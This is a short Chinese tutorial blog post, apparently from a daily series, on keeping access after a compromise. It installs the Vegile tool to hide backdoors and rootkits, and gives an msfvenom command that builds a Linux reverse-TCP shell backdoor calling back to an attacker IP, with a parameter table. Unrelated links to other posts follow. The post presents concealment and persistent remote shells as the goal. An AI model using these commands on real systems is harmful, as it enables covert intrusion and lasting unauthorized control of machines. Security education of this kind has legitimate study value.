哈罗~
来review一下,
之前提到维持权限时,
攻击者会建立後门或Rootkit,
并且会隐藏其恶意档案/程序。
今天要来介绍一个隐藏後门或Rootkit的小工具。
这个工具是当我们已设置好後门或Rootkit时,
可以协助我们来隐藏其踪迹,
并且会无限的连接Metasploit来保持Session。
环境:Kali ─攻击方(192.168.168.131)
安装Vegile。
git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile
可透过./Vegile --h
来查看参数说明。
透过metaspolit中的msfvenom来制作一个後门。
msfvenom -p linux/x64/shell/reverse_tcp lhost=[攻击者IP] lport=[自订port] -f elf -o [自订後门的路径]
msfvenom 参数说明:
参数 | 说明 |
---|---|
-p | 指定需要使用的payload |
-l | 列出模组类型(payloads、encoders、nops、all) |
-f | 指定输出格式(format) |
-b | 要规避的字符(bad char) |
-a | 指定目标系统的架构(x86 or x64) |
-i | payload的编码次数 |
-o | 输出payload的路径跟档名 |
更多msfvenom参数说明可使用`msfvenom -h`。
今天开始双十连假,
在连假第一天凌晨,
我们建立了一个後门。
先休息一下...
明天继续...
睡罗! 高歌离席~
<<: 【在 iOS 开发路上的大小事-Day27】透过 Firebase 来管理资料 (Cloud Firestore 篇) Part1
在 Vue.js 有的生命周期在 Livewire 中也都有,除此之外在 Livewire 中各自变...
题号:2007 标题:Find Original Array From Doubled Array ...
前端系虾米? 身为一个麻瓜,当初在看到前端两个字, 着实就猜想不就字面意思?应该系前後面,反之另一个...
回顾 30天咻的一下就过去了,第一次的铁人赛暂时画下小句点,那些期待补的篇幅我没忘(?) 漂向何处 ...
Python - Python3 虚拟环境参考笔记 参考资料 资料来源:架设 Django 开发环境...